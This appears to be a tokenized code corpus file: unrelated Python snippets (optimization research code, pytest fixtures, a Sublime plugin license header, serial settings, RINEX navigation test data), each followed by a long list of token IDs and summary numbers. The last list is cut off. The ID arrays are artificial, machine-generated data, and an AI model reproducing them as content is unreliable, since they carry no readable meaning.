220, 198, 4798, 7, 77, 532, 954, 8, 198 ]
1.377644
331
""" """ from __future__ import print_function, division import os from demo import * import subprocess import sys sys.path.append(os.path.abspath('../problems/')) # Get the git root directory root=repo_dir = subprocess.Popen(['git' ,'rev-parse' , '--show-toplevel'] , stdout=subprocess.PIPE ).communicate()[0].rstrip() sys.path.append(root) from pdb import set_trace from dtlz2 import DTLZ2 from multiprocessing import Pool from random import seed as rseed, randint as randi import numpy as np from time import time from tools.quality import measure def gale0(model=DTLZ2(n_dec=30,n_obj=3), new=[], pop=int(1e4)): """ Recursive FASTMAP clustering. """ if len(new)==0: frontier = model.generate(pop) else: frontier=new frontier.extend(model.generate(pop-len(new))) N = np.shape(frontier)[0] leaf = [] norm = np.max(frontier, axis=0) - np.min(frontier, axis=0) recurse(frontier) a,b=distant(leaf) (good, bad) = (a,b) if cdom(model.solve(a), model.solve(b)) else (b,a) new=mutate(leaf,good,g=0.5) return new def GALE2(n_proc=10,frontSize=100,iters=1000,model=DTLZ2(n_dec=30, n_obj=3)): """ WHY do threads take more time than single processors?? FIX THIS!!! :param n_proc: :param frontSize: :param iters: :param model: :return: """ t = time() collect=[] final = [] popSize = [int(frontSize/n_proc)]*n_proc # initpop = [(model, model.generate(1000), 1000) for _ in xrange(n_proc)] p=Pool(processes=n_proc) collect.extend(p.map(gale2, popSize)) for cc in collect: final.extend(cc) # set_trace() ret = gale0(model=DTLZ2(n_dec=30, n_obj=3),new=final,pop=len(final)) print('Time Taken: ', time()-t) return ret if __name__=="__main__": eval(cmd())
[ 37811, 198, 37811, 198, 6738, 11593, 37443, 834, 1330, 3601, 62, 8818, 11, 7297, 198, 198, 11748, 28686, 198, 6738, 13605, 1330, 1635, 198, 11748, 850, 14681, 198, 11748, 25064, 198, 17597, 13, 6978, 13, 33295, 7, 418, 13, 6978, 13, 397, 2777, 776, 10786, 40720, 1676, 22143, 14, 6, 4008, 198, 2, 3497, 262, 17606, 6808, 8619, 198, 15763, 28, 260, 7501, 62, 15908, 796, 850, 14681, 13, 47, 9654, 7, 17816, 18300, 6, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 837, 6, 18218, 12, 29572, 6, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 837, 705, 438, 12860, 12, 83, 643, 626, 20520, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 837, 14367, 448, 28, 7266, 14681, 13, 47, 4061, 36, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 6739, 10709, 5344, 3419, 58, 15, 4083, 81, 36311, 3419, 198, 198, 17597, 13, 6978, 13, 33295, 7, 15763, 8, 198, 6738, 279, 9945, 1330, 900, 62, 40546, 198, 6738, 288, 28781, 89, 17, 1330, 360, 14990, 57, 17, 198, 6738, 18540, 305, 919, 278, 1330, 19850, 198, 6738, 4738, 1330, 9403, 355, 374, 28826, 11, 43720, 600, 355, 374, 26800, 198, 11748, 299, 32152, 355, 45941, 198, 6738, 640, 1330, 640, 198, 6738, 4899, 13, 13237, 1330, 3953, 198, 198, 4299, 308, 1000, 15, 7, 19849, 28, 35, 14990, 57, 17, 7, 77, 62, 12501, 28, 1270, 11, 77, 62, 26801, 28, 18, 828, 649, 41888, 4357, 1461, 28, 600, 7, 16, 68, 19, 8, 2599, 198, 220, 37227, 198, 220, 3311, 30753, 376, 11262, 33767, 32966, 1586, 13, 198, 220, 37227, 198, 220, 611, 18896, 7, 3605, 8, 855, 15, 25, 198, 220, 220, 220, 27580, 796, 2746, 13, 8612, 378, 7, 12924, 8, 198, 220, 2073, 25, 198, 220, 220, 220, 27580, 28, 3605, 198, 220, 220, 220, 27580, 13, 2302, 437, 7, 19849, 13, 8612, 378, 7, 12924, 12, 11925, 7, 3605, 22305, 628, 220, 399, 796, 45941, 13, 43358, 7, 8534, 959, 38381, 15, 60, 198, 220, 12835, 796, 17635, 198, 220, 2593, 796, 45941, 13, 9806, 7, 8534, 959, 11, 16488, 28, 15, 8, 532, 45941, 13, 1084, 7, 8534, 959, 11, 16488, 28, 15, 8, 628, 220, 664, 12321, 7, 8534, 959, 8, 198, 220, 257, 11, 65, 28, 67, 10167, 7, 33201, 8, 198, 220, 357, 11274, 11, 2089, 8, 796, 357, 64, 11, 65, 8, 611, 269, 3438, 7, 19849, 13, 82, 6442, 7, 64, 828, 2746, 13, 82, 6442, 7, 65, 4008, 2073, 357, 65, 11, 64, 8, 198, 220, 649, 28, 21973, 378, 7, 33201, 11, 11274, 11, 70, 28, 15, 13, 20, 8, 198, 220, 1441, 649, 198, 198, 4299, 402, 21358, 17, 7, 77, 62, 36942, 28, 940, 11, 8534, 10699, 28, 3064, 11, 270, 364, 28, 12825, 11, 19849, 28, 35, 14990, 57, 17, 7, 77, 62, 12501, 28, 1270, 11, 299, 62, 26801, 28, 18, 8, 2599, 198, 220, 37227, 198, 220, 44463, 466, 14390, 1011, 517, 640, 621, 2060, 20399, 3548, 44855, 12680, 10185, 198, 220, 1058, 17143, 299, 62, 36942, 25, 198, 220, 1058, 17143, 2166, 10699, 25, 198, 220, 1058, 17143, 340, 364, 25, 198, 220, 1058, 17143, 2746, 25, 198, 220, 1058, 7783, 25, 198, 220, 37227, 198, 220, 256, 796, 640, 3419, 198, 220, 2824, 28, 21737, 198, 220, 2457, 796, 17635, 198, 220, 1461, 10699, 796, 685, 600, 7, 8534, 10699, 14, 77, 62, 36942, 15437, 9, 77, 62, 36942, 198, 220, 1303, 2315, 12924, 796, 47527, 19849, 11, 2746, 13, 8612, 378, 7, 12825, 828, 8576, 8, 329, 4808, 287, 2124, 9521, 7, 77, 62, 36942, 15437, 198, 220, 279, 28, 27201, 7, 14681, 274, 28, 77, 62, 36942, 8, 198, 220, 2824, 13, 2302, 437, 7, 79, 13, 8899, 7, 70, 1000, 17, 11, 1461, 10699, 4008, 198, 220, 329, 36624, 287, 2824, 25, 2457, 13, 2302, 437, 7, 535, 8, 198, 220, 1303, 900, 62, 40546, 3419, 198, 220, 1005, 796, 308, 1000, 15, 7, 19849, 28, 35, 14990, 57, 17, 7, 77, 62, 12501, 28, 1270, 11, 299, 62, 26801, 28, 18, 828, 3605, 28, 20311, 11, 12924, 28, 11925, 7, 20311, 4008, 198, 220, 3601, 10786, 7575, 30222, 25, 46083, 640, 3419, 12, 83, 8, 198, 220, 1441, 1005, 198, 198, 361, 11593, 3672, 834, 855, 1, 834, 12417, 834, 1298, 198, 220, 5418, 7, 28758, 28955 ]
2.223013
843
import os from unittest.mock import patch from pytest import fixture, mark from ..bitbucket import BitbucketOAuthenticator from .mocks import setup_oauth_mock def user_model(username): """Return a user model""" return { 'username': username, } @fixture
[ 11748, 28686, 198, 6738, 555, 715, 395, 13, 76, 735, 1330, 8529, 198, 198, 6738, 12972, 9288, 1330, 29220, 11, 1317, 198, 198, 6738, 11485, 2545, 27041, 316, 1330, 4722, 27041, 316, 46, 47649, 26407, 198, 198, 6738, 764, 76, 3320, 1330, 9058, 62, 12162, 1071, 62, 76, 735, 628, 198, 4299, 2836, 62, 19849, 7, 29460, 2599, 198, 220, 220, 220, 37227, 13615, 257, 2836, 2746, 37811, 198, 220, 220, 220, 1441, 1391, 198, 220, 220, 220, 220, 220, 220, 220, 705, 29460, 10354, 20579, 11, 198, 220, 220, 220, 1782, 198, 198, 31, 69, 9602, 628, 198 ]
2.838384
99
import pytest from stockmarket.agent import Trader from stockmarket.switchingstrategies import * from stockmarket.valuationfunctions import * from numpy.testing import assert_equal from numpy.testing import assert_raises @pytest.fixture()
[ 11748, 12972, 9288, 198, 6738, 4283, 10728, 13, 25781, 1330, 41956, 198, 6738, 4283, 10728, 13, 2032, 19811, 2536, 2397, 444, 1330, 1635, 198, 6738, 4283, 10728, 13, 2100, 2288, 12543, 2733, 1330, 1635, 198, 6738, 299, 32152, 13, 33407, 1330, 6818, 62, 40496, 198, 6738, 299, 32152, 13, 33407, 1330, 6818, 62, 430, 2696, 628, 198, 31, 9078, 9288, 13, 69, 9602, 3419, 628 ]
3.723077
65
"""pmi_odds.py: computes the PMI (Pointwise mutual information) with odds """ import json import os from probabilities import pmi_odds __author__ = "Edimar Manica"
[ 37811, 4426, 72, 62, 5088, 82, 13, 9078, 25, 552, 1769, 262, 3122, 40, 357, 12727, 3083, 13584, 1321, 8, 351, 10402, 198, 198, 37811, 198, 11748, 33918, 198, 11748, 28686, 198, 198, 6738, 39522, 1330, 9114, 72, 62, 5088, 82, 198, 198, 834, 9800, 834, 220, 220, 220, 220, 220, 796, 366, 7407, 49399, 1869, 3970, 1, 198 ]
2.915254
59
# NOTE(kaste): Take from https://github.com/randy3k/AlignTab # Copyright (c) 2015 Randy Lai <[email protected]> # # Permission is hereby granted, free of charge, to any person obtaining a copy # of this software and associated documentation files (the "Software"), to deal # in the Software without restriction, including without limitation the rights # to use, copy, modify, merge, publish, distribute, sublicense, and/or sell # copies of the Software, and to permit persons to whom the Software is # furnished to do so, subject to the following conditions: # # The above copyright notice and this permission notice shall be included in all # copies or substantial portions of the Software. # # THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR # IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, # FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE # AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER # LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, # OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE # SOFTWARE. import sublime import sublime_plugin if 'history' not in globals(): history = History()
[ 2, 24550, 7, 74, 4594, 2599, 7214, 422, 3740, 1378, 12567, 13, 785, 14, 81, 10757, 18, 74, 14, 2348, 570, 33349, 198, 198, 2, 15069, 357, 66, 8, 1853, 21248, 406, 1872, 1279, 81, 10757, 13, 6359, 13, 75, 1872, 31, 14816, 13, 785, 29, 198, 2, 198, 2, 2448, 3411, 318, 29376, 7520, 11, 1479, 286, 3877, 11, 284, 597, 1048, 16727, 257, 4866, 198, 2, 286, 428, 3788, 290, 3917, 10314, 3696, 357, 1169, 366, 25423, 12340, 284, 1730, 198, 2, 287, 262, 10442, 1231, 17504, 11, 1390, 1231, 17385, 262, 2489, 198, 2, 284, 779, 11, 4866, 11, 13096, 11, 20121, 11, 7715, 11, 14983, 11, 850, 43085, 11, 290, 14, 273, 3677, 198, 2, 9088, 286, 262, 10442, 11, 290, 284, 8749, 6506, 284, 4150, 262, 10442, 318, 198, 2, 30760, 284, 466, 523, 11, 2426, 284, 262, 1708, 3403, 25, 198, 2, 198, 2, 383, 2029, 6634, 4003, 290, 428, 7170, 4003, 2236, 307, 3017, 287, 477, 198, 2, 9088, 393, 8904, 16690, 286, 262, 10442, 13, 198, 2, 198, 2, 3336, 47466, 3180, 36592, 2389, 1961, 366, 1921, 3180, 1600, 42881, 34764, 56, 3963, 15529, 509, 12115, 11, 7788, 32761, 6375, 198, 2, 8959, 49094, 11, 47783, 2751, 21728, 5626, 40880, 5390, 3336, 34764, 11015, 3963, 34482, 3398, 1565, 5603, 25382, 11, 198, 2, 376, 46144, 7473, 317, 16652, 2149, 37232, 33079, 48933, 5357, 44521, 1268, 10913, 2751, 12529, 13, 3268, 8005, 49261, 50163, 3336, 198, 2, 37195, 20673, 6375, 27975, 38162, 9947, 367, 15173, 4877, 9348, 43031, 19146, 7473, 15529, 47666, 3955, 11, 29506, 25552, 6375, 25401, 198, 2, 43031, 25382, 11, 7655, 2767, 16879, 3268, 3537, 40282, 3963, 27342, 10659, 11, 309, 9863, 6375, 25401, 54, 24352, 11, 5923, 1797, 2751, 16034, 11, 198, 2, 16289, 3963, 6375, 3268, 7102, 45, 24565, 13315, 3336, 47466, 6375, 3336, 23210, 6375, 25401, 5550, 1847, 20754, 3268, 3336, 198, 2, 47466, 13, 628, 198, 11748, 41674, 198, 11748, 41674, 62, 33803, 628, 198, 361, 705, 23569, 6, 407, 287, 15095, 874, 33529, 198, 220, 220, 220, 2106, 796, 7443, 3419, 628 ]
3.665706
347
baud_rate = 115200 port = "/dev/ttyACM1" input_file=None output_file='log.txt' wait_for_flash = 10 bits_to_cache = 1600 mxchip_file = "/media/newt/AZ31665" setup_string = "Setup complete" skip_setup = False mxchip_buf_pause = .06 serial_comm_timeout = 2 device_type = 'mxchip' test_timeout = None reset_device = False tests_run = False
[ 65, 3885, 62, 4873, 796, 12279, 2167, 198, 634, 796, 12813, 7959, 14, 42852, 2246, 44, 16, 1, 198, 15414, 62, 7753, 28, 14202, 198, 22915, 62, 7753, 11639, 6404, 13, 14116, 6, 198, 17077, 62, 1640, 62, 34167, 796, 838, 198, 9895, 62, 1462, 62, 23870, 796, 26143, 198, 36802, 35902, 62, 7753, 796, 12813, 11431, 14, 3605, 83, 14, 22778, 33400, 2996, 1, 198, 40406, 62, 8841, 796, 366, 40786, 1844, 1, 198, 48267, 62, 40406, 796, 10352, 198, 36802, 35902, 62, 29325, 62, 32125, 796, 764, 3312, 198, 46911, 62, 9503, 62, 48678, 796, 362, 198, 25202, 62, 4906, 796, 705, 36802, 35902, 6, 198, 9288, 62, 48678, 796, 6045, 198, 42503, 62, 25202, 796, 10352, 198, 41989, 62, 5143, 796, 10352, 198 ]
2.666667
126
if __name__ == '__main__': import sys import pickle from multiprocessing import current_process from multiprocessing.spawn import import_main_path data = pickle.load(sys.stdin.buffer) current_process().authkey = data['authkey'] sys.path = data['path'] import_main_path(data['main']) impl = pickle.loads(data['impl']) from pulsar.async.concurrency import run_actor run_actor(impl)
[ 198, 361, 11593, 3672, 834, 6624, 705, 834, 12417, 834, 10354, 198, 220, 220, 220, 1330, 25064, 198, 220, 220, 220, 1330, 2298, 293, 198, 220, 220, 220, 422, 18540, 305, 919, 278, 1330, 1459, 62, 14681, 198, 220, 220, 220, 422, 18540, 305, 919, 278, 13, 48183, 1330, 1330, 62, 12417, 62, 6978, 628, 220, 220, 220, 1366, 796, 2298, 293, 13, 2220, 7, 17597, 13, 19282, 259, 13, 22252, 8, 198, 220, 220, 220, 1459, 62, 14681, 22446, 18439, 2539, 796, 1366, 17816, 18439, 2539, 20520, 198, 220, 220, 220, 25064, 13, 6978, 796, 1366, 17816, 6978, 20520, 198, 220, 220, 220, 1330, 62, 12417, 62, 6978, 7, 7890, 17816, 12417, 6, 12962, 198, 220, 220, 220, 4114, 796, 2298, 293, 13, 46030, 7, 7890, 17816, 23928, 6, 12962, 628, 220, 220, 220, 422, 22271, 283, 13, 292, 13361, 13, 1102, 34415, 1330, 1057, 62, 11218, 628, 220, 220, 220, 1057, 62, 11218, 7, 23928, 8, 198 ]
2.691824
159
from io import StringIO import pytest from testlib import mktmp _nav_content_v2 = '''\ 2 NAVIGATION DATA RINEX VERSION / TYPE CCRINEXN V1.6.0 UX CDDIS 12-APR-16 17:31 PGM / RUN BY / DATE IGS BROADCAST EPHEMERIS FILE COMMENT 0.1583D-07 0.1490D-07 -0.1192D-06 -0.1192D-06 ION ALPHA 0.1065D+06 0.6554D+05 -0.1966D+06 -0.1966D+06 ION BETA 0.186264514923D-08 0.000000000000D+00 233472 1892 DELTA-UTC: A0,A1,T,W 17 LEAP SECONDS END OF HEADER 1 16 4 11 0 0 0.0 0.169607810676D-04 0.113686837722D-11 0.000000000000D+00 0.350000000000D+02 0.222500000000D+02 0.482198656938D-08 0.368417754673D+00 0.121630728245D-05 0.527631223667D-02 0.668689608574D-05 0.515364252472D+04 0.864000000000D+05 0.391155481338D-07-0.140616900879D+01 0.106170773506D-06 0.963711739811D+00 0.247687500000D+03 0.450110393247D+00-0.827070165078D-08 0.284654714154D-09 0.100000000000D+01 0.189200000000D+04 0.000000000000D+00 0.200000000000D+01 0.000000000000D+00 0.512227416039D-08 0.350000000000D+02 0.805020000000D+05 0.400000000000D+01 0.000000000000D+00 0.000000000000D+00 2 16 4 11 0 0 0.0 0.597649253905D-03-0.181898940355D-11 0.000000000000D+00 0.830000000000D+02 0.185937500000D+02 0.527057686384D-08 0.763017673126D+00 0.114180147648D-05 0.156129685929D-01 0.783614814282D-05 0.515374914742D+04 0.864000000000D+05-0.163912773132D-06-0.145069785349D+01 0.100582838059D-06 0.942463959213D+00 0.223656250000D+03-0.213318032835D+01-0.861071569602D-08 0.216080431326D-09 0.100000000000D+01 0.189200000000D+04 0.000000000000D+00 0.200000000000D+01 0.000000000000D+00-0.200234353542D-07 0.830000000000D+02 0.864000000000D+05 0.000000000000D+00 0.000000000000D+00 0.000000000000D+00 ''' _nav_content_v3 = '''\ 3.03 NAVIGATION DATA M (Mixed) RINEX VERSION / TYPE BCEmerge congo 20170909 012902 GMT PGM / RUN BY / DATE Merged GPS/GLO/GAL/BDS/QZS/SBAS/IRNSS navigation file COMMENT based on CONGO and MGEX tracking data COMMENT DLR: O. Montenbruck; TUM: P. Steigenberger COMMENT GAUT 2.7939677238e-09 1.776356839e-15 345600 1965 TIME SYSTEM CORR GLGP 1.8626451492e-08 0.000000000e+00 345600 1965 TIME SYSTEM CORR GLUT 9.3132257462e-10 0.000000000e+00 345600 1965 TIME SYSTEM CORR GPGA 1.0040821508e-08 3.330669074e-14 432000 1965 TIME SYSTEM CORR GPUT 9.3132257462e-10 1.776356839e-15 589824 1965 TIME SYSTEM CORR QZUT 6.5192580223e-09 0.000000000e+00 8192 1966 TIME SYSTEM CORR 18 LEAP SECONDS END OF HEADER G01 2017 09 08 00 00 00 5.530333146453e-05-4.547473508865e-13 0.000000000000e+00 7.200000000000e+01-2.653125000000e+01 4.883774857397e-09-2.309091328065e-01 -1.233071088791e-06 7.021094555967e-03 2.788379788399e-06 5.153673307419e+03 4.320000000000e+05 7.823109626770e-08 2.011192878165e+00 4.284083843231e-08 9.681868691207e-01 3.310000000000e+02 6.192489497701e-01-8.576071513516e-09 -2.500104139373e-11 1.000000000000e+00 1.965000000000e+03 0.000000000000e+00 2.000000000000e+00 0.000000000000e+00 5.587935447693e-09 7.200000000000e+01 4.248180000000e+05 4.000000000000e+00 S20 2017 09 08 00 16 32 0.000000000000e+00 0.000000000000e+00 4.330030000000e+05 4.063672000000e+04 0.000000000000e+00 0.000000000000e+00 1.000000000000e+00 -1.124591600000e+04 0.000000000000e+00 0.000000000000e+00 3.276700000000e+04 0.000000000000e+00 0.000000000000e+00 0.000000000000e+00 2.150000000000e+02 ''' _nav_content_v3_unsorted = '''\ 3.03 NAVIGATION DATA M (Mixed) RINEX VERSION / TYPE BCEmerge congo 20170909 012902 GMT PGM / RUN BY / DATE 18 LEAP SECONDS END OF HEADER S20 2017 09 08 00 05 52 0.000000000000e+00 0.000000000000e+00 4.323620000000e+05 4.063672000000e+04 0.000000000000e+00 0.000000000000e+00 1.000000000000e+00 -1.124591600000e+04 0.000000000000e+00 0.000000000000e+00 3.276700000000e+04 0.000000000000e+00 0.000000000000e+00 0.000000000000e+00 2.200000000000e+01 S20 2017 09 08 00 00 32 0.000000000000e+00 0.000000000000e+00 4.320410000000e+05 4.063672000000e+04 0.000000000000e+00 0.000000000000e+00 1.000000000000e+00 -1.124591600000e+04 0.000000000000e+00 0.000000000000e+00 3.276700000000e+04 0.000000000000e+00 0.000000000000e+00 0.000000000000e+00 2.000000000000e+00 S20 2017 09 08 00 03 12 0.000000000000e+00 0.000000000000e+00 4.322000000000e+05 4.063672000000e+04 0.000000000000e+00 0.000000000000e+00 1.000000000000e+00 -1.124591600000e+04 0.000000000000e+00 0.000000000000e+00 3.276700000000e+04 0.000000000000e+00 0.000000000000e+00 0.000000000000e+00 1.200000000000e+01 ''' @pytest.fixture @pytest.fixture @pytest.fixture @pytest.fixture @pytest.fixture
[ 6738, 33245, 1330, 10903, 9399, 198, 198, 11748, 12972, 9288, 198, 6738, 1332, 8019, 1330, 285, 21841, 3149, 198, 198, 62, 28341, 62, 11299, 62, 85, 17, 796, 705, 7061, 59, 198, 220, 220, 220, 220, 362, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 47140, 3528, 6234, 42865, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 371, 1268, 6369, 44156, 2849, 1220, 41876, 198, 4093, 49, 1268, 6369, 45, 569, 16, 13, 21, 13, 15, 38179, 220, 6458, 26288, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 1105, 12, 2969, 49, 12, 1433, 1596, 25, 3132, 220, 220, 220, 220, 350, 15548, 1220, 32494, 11050, 1220, 360, 6158, 220, 198, 3528, 50, 11177, 41048, 44647, 412, 11909, 3620, 1137, 1797, 45811, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 9440, 10979, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 198, 220, 220, 220, 657, 13, 1314, 5999, 35, 12, 2998, 220, 657, 13, 1415, 3829, 35, 12, 2998, 532, 15, 13, 16315, 17, 35, 12, 3312, 532, 15, 13, 16315, 17, 35, 12, 3312, 220, 220, 220, 220, 220, 220, 220, 220, 220, 314, 1340, 42674, 7801, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 198, 220, 220, 220, 657, 13, 940, 2996, 35, 10, 3312, 220, 657, 13, 35916, 19, 35, 10, 2713, 532, 15, 13, 44227, 35, 10, 3312, 532, 15, 13, 44227, 35, 10, 3312, 220, 220, 220, 220, 220, 220, 220, 220, 220, 314, 1340, 347, 20892, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 198, 220, 220, 220, 657, 13, 25096, 2075, 2231, 19442, 1954, 35, 12, 2919, 657, 13, 8269, 2388, 35, 10, 405, 220, 220, 30435, 37856, 220, 220, 220, 220, 1248, 5892, 28163, 5603, 12, 17429, 25, 317, 15, 11, 32, 16, 11, 51, 11, 54, 198, 220, 220, 220, 1596, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 12509, 2969, 10729, 1340, 5258, 220, 220, 220, 220, 220, 220, 220, 220, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 23578, 3963, 39837, 1137, 220, 220, 220, 220, 220, 220, 220, 198, 352, 1467, 220, 604, 1367, 220, 657, 220, 657, 220, 657, 13, 15, 657, 13, 22172, 1899, 3695, 940, 42548, 35, 12, 3023, 657, 13, 1157, 27412, 3104, 26514, 1828, 35, 12, 1157, 657, 13, 8269, 2388, 35, 10, 405, 198, 220, 220, 220, 657, 13, 2327, 8269, 405, 35, 10, 2999, 657, 13, 1828, 1495, 8269, 35, 10, 2999, 657, 13, 40149, 22337, 2996, 3388, 2548, 35, 12, 2919, 657, 13, 2623, 5705, 1558, 2425, 24669, 18, 35, 10, 405, 198, 220, 220, 220, 657, 13, 1065, 1433, 22996, 2078, 22995, 35, 12, 2713, 657, 13, 20, 1983, 5066, 1065, 1954, 28933, 35, 12, 2999, 657, 13, 35809, 40523, 28688, 46900, 35, 12, 2713, 657, 13, 20, 21395, 2414, 1495, 1731, 4761, 35, 10, 3023, 198, 220, 220, 220, 657, 13, 39570, 10535, 830, 35, 10, 2713, 657, 13, 2670, 1157, 2816, 2780, 1485, 2548, 35, 12, 2998, 12, 15, 13, 1415, 3312, 1433, 12865, 23, 3720, 35, 10, 486, 657, 13, 15801, 1558, 2998, 4790, 35638, 35, 12, 3312, 198, 220, 220, 220, 657, 13, 4846, 2718, 17657, 31952, 1157, 35, 10, 405, 657, 13, 23753, 3104, 2425, 20483, 35, 10, 3070, 657, 13, 2231, 486, 940, 26007, 23753, 35, 10, 405, 12, 15, 13, 23, 1983, 2998, 486, 17544, 3695, 35, 12, 2919, 198, 220, 220, 220, 657, 13, 30336, 2996, 2857, 1415, 21526, 35, 12, 2931, 657, 13, 16, 8269, 830, 35, 10, 486, 657, 13, 23362, 2167, 10535, 35, 10, 3023, 657, 13, 8269, 2388, 35, 10, 405, 198, 220, 220, 220, 657, 13, 2167, 10535, 830, 35, 10, 486, 657, 13, 8269, 2388, 35, 10, 405, 657, 13, 25836, 1828, 4524, 14198, 2670, 35, 12, 2919, 657, 13, 2327, 8269, 405, 35, 10, 2999, 198, 220, 220, 220, 657, 13, 1795, 1120, 2167, 20483, 35, 10, 2713, 657, 13, 19, 8269, 830, 35, 10, 486, 657, 13, 8269, 2388, 35, 10, 405, 657, 13, 8269, 2388, 35, 10, 405, 198, 362, 1467, 220, 604, 1367, 220, 657, 220, 657, 220, 657, 13, 15, 657, 13, 43239, 33300, 1495, 2670, 2713, 35, 12, 3070, 12, 15, 13, 1507, 1507, 42520, 1821, 28567, 35, 12, 1157, 657, 13, 8269, 2388, 35, 10, 405, 198, 220, 220, 220, 657, 13, 5999, 8269, 405, 35, 10, 2999, 657, 13, 1507, 3270, 22318, 20483, 35, 10, 2999, 657, 13, 20, 1983, 2713, 30610, 21, 22842, 35, 12, 2919, 657, 13, 4304, 18938, 32059, 18, 19420, 35, 10, 405, 198, 220, 220, 220, 657, 13, 16562, 1507, 486, 2857, 34287, 35, 12, 2713, 657, 13, 21599, 18741, 3104, 3270, 1959, 35, 12, 486, 657, 13, 3695, 2623, 18294, 1415, 32568, 35, 12, 2713, 657, 13, 45969, 2718, 2920, 20198, 3682, 35, 10, 3023, 198, 220, 220, 220, 657, 13, 39570, 10535, 830, 35, 10, 2713, 12, 15, 13, 1433, 2670, 1065, 46871, 19924, 35, 12, 3312, 12, 15, 13, 1415, 1120, 3388, 41172, 27371, 35, 10, 486, 657, 13, 3064, 3365, 2078, 23734, 3270, 35, 12, 3312, 198, 220, 220, 220, 657, 13, 5824, 26912, 2670, 3270, 26427, 35, 10, 405, 657, 13, 1828, 2623, 3980, 1495, 2388, 35, 10, 3070, 12, 15, 13, 17, 16945, 1507, 3070, 2078, 2327, 35, 10, 486, 12, 15, 13, 4521, 15982, 1314, 3388, 31418, 35, 12, 2919, 198, 220, 220, 220, 657, 13, 17, 14198, 1795, 3559, 1485, 2075, 35, 12, 2931, 657, 13, 16, 8269, 830, 35, 10, 486, 657, 13, 23362, 2167, 10535, 35, 10, 3023, 657, 13, 8269, 2388, 35, 10, 405, 198, 220, 220, 220, 657, 13, 2167, 10535, 830, 35, 10, 486, 657, 13, 8269, 2388, 35, 10, 405, 12, 15, 13, 2167, 24409, 2327, 2327, 3682, 35, 12, 2998, 657, 13, 5999, 8269, 405, 35, 10, 2999, 198, 220, 220, 220, 657, 13, 39570, 10535, 830, 35, 10, 2713, 657, 13, 8269, 2388, 35, 10, 405, 657, 13, 8269, 2388, 35, 10, 405, 657, 13, 8269, 2388, 35, 10, 405, 198, 7061, 6, 198, 198, 62, 28341, 62, 11299, 62, 85, 18, 796, 705, 7061, 59, 198, 220, 220, 220, 220, 513, 13, 3070, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 47140, 3528, 6234, 42865, 220, 220, 220, 220, 337, 357, 44, 2966, 8, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 371, 1268, 6369, 44156, 2849, 1220, 41876, 198, 2749, 32779, 469, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 369, 2188, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 580, 31495, 2931, 5534, 1959, 2999, 16987, 350, 15548, 1220, 32494, 11050, 1220, 360, 6158, 220, 198, 13102, 2004, 15472, 14, 8763, 46, 14, 38, 1847, 14, 33, 5258, 14, 48, 57, 50, 14, 16811, 1921, 14, 4663, 45, 5432, 16408, 2393, 220, 220, 220, 220, 220, 220, 9440, 10979, 220, 198, 3106, 319, 7102, 11230, 290, 34809, 6369, 9646, 1366, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 9440, 10979, 220, 198, 19260, 49, 25, 440, 13, 5575, 268, 65, 30915, 26, 220, 309, 5883, 25, 350, 13, 2441, 9324, 21041, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 9440, 10979, 220, 198, 9273, 3843, 220, 362, 13, 3720, 2670, 40179, 23721, 68, 12, 2931, 352, 13, 39509, 2327, 3104, 2670, 68, 12, 1314, 39937, 8054, 17672, 220, 220, 220, 220, 220, 220, 220, 220, 220, 20460, 36230, 23929, 49, 220, 220, 220, 220, 198, 8763, 16960, 220, 352, 13, 4521, 2075, 2231, 1415, 